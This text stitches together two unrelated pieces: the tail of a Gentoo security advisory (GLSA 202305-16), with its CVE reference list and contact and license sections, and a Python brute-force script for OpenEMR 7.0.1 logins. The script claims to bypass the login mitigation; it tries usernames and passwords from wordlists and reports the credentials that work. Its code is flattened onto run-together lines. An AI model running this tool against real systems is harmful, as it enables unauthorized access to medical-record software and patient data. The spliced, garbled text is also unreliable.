      https://nvd.nist.gov/vuln/detail/CVE-2022-2304  
[ 49 ] CVE-2022-2343  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2343  
[ 50 ] CVE-2022-2344  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2344  
[ 51 ] CVE-2022-2345  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2345  
[ 52 ] CVE-2022-2522  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2522  
[ 53 ] CVE-2022-2816  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2816  
[ 54 ] CVE-2022-2817  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2817  
[ 55 ] CVE-2022-2819  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2819  
[ 56 ] CVE-2022-2845  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2845  
[ 57 ] CVE-2022-2849  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2849  
[ 58 ] CVE-2022-2862  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2862  
[ 59 ] CVE-2022-2874  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2874  
[ 60 ] CVE-2022-2889  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2889  
[ 61 ] CVE-2022-2923  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2923  
[ 62 ] CVE-2022-2946  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2946  
[ 63 ] CVE-2022-2980  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2980  
[ 64 ] CVE-2022-2982  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2982  
[ 65 ] CVE-2022-3016  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3016  
[ 66 ] CVE-2022-3099  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3099  
[ 67 ] CVE-2022-3134  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3134  
[ 68 ] CVE-2022-3153  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3153  
[ 69 ] CVE-2022-3234  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3234  
[ 70 ] CVE-2022-3235  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3235  
[ 71 ] CVE-2022-3256  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3256  
[ 72 ] CVE-2022-3278  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3278  
[ 73 ] CVE-2022-3296  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3296  
[ 74 ] CVE-2022-3297  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3297  
[ 75 ] CVE-2022-3324  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3324  
[ 76 ] CVE-2022-3352  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3352  
[ 77 ] CVE-2022-3491  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3491  
[ 78 ] CVE-2022-3520  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3520  
[ 79 ] CVE-2022-3591  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3591  
[ 80 ] CVE-2022-3705  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3705  
[ 81 ] CVE-2022-4141  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4141  
[ 82 ] CVE-2022-4292  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4292  
[ 83 ] CVE-2022-4293  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4293  
[ 84 ] CVE-2022-47024  
      https://nvd.nist.gov/vuln/detail/CVE-2022-47024  
[ 85 ] CVE-2023-0049  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0049  
[ 86 ] CVE-2023-0051  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0051  
[ 87 ] CVE-2023-0054  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0054

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-16

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-16

OpenEMR versions 7.0.1 and below remote authentication bruteforcing tool that bypasses mitigations.

    # Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force# Date: 2023-04-28# Exploit Author: abhhi (Abhishek Birdawade)# Vendor Homepage: https://www.open-emr.org/# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz# Version: 7.0.1# Tested on: Windows'''Example Usage:- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt '''import requestsimport sysimport argparse, textwrapfrom pwn import *#Expected Argumentsparser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))                     parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.")parser.add_argument("-ul","--userlist", help="Username Dictionary")  parser.add_argument("-p","--passlist", help="Password Dictionary")    args = parser.parse_args()if len(sys.argv) < 2:    print (f"Exploit Usage: python3 exploitBF.py -h")              sys.exit(1)  # VariableLoginPage = args.urlUsername = args.usernameUsername_list = args.userlistPassword_list = args.passlistlog.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')def login(Username,Password):    session = requests.session()              r = session.get(LoginPage) # Progress Check        process = log.progress('Brute Force')#Specifying Headers Value    headerscontent = {    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',    'Referer' : f"{LoginPage}",    'Origin' : f"{LoginPage}",    }#POST REQ data    postreqcontent = {    'new_login_session_management' : 1,    'languageChoice' : 1,    'authUser' : f"{Username}",    'clearPass' : f"{Password}"    }#Sending POST REQ    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)#Printing Username:Password                process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))            #Conditional loops        if 'Location' in r.headers:        if "/interface/main/tabs/main.php" in r.headers['Location']:            print()            log.info(f'SUCCESS !!')            log.success(f"Use Credential -> {Username}:{Password}")            sys.exit(0)        #Reading User.txt & Pass.txt filesif Username_list:    userfile = open(Username_list).readlines()    for Username in userfile:        Username = Username.strip() passfile = open(Password_list).readlines()for Password in passfile:    Password = Password.strip()       login(Username,Password)

Tag

#linux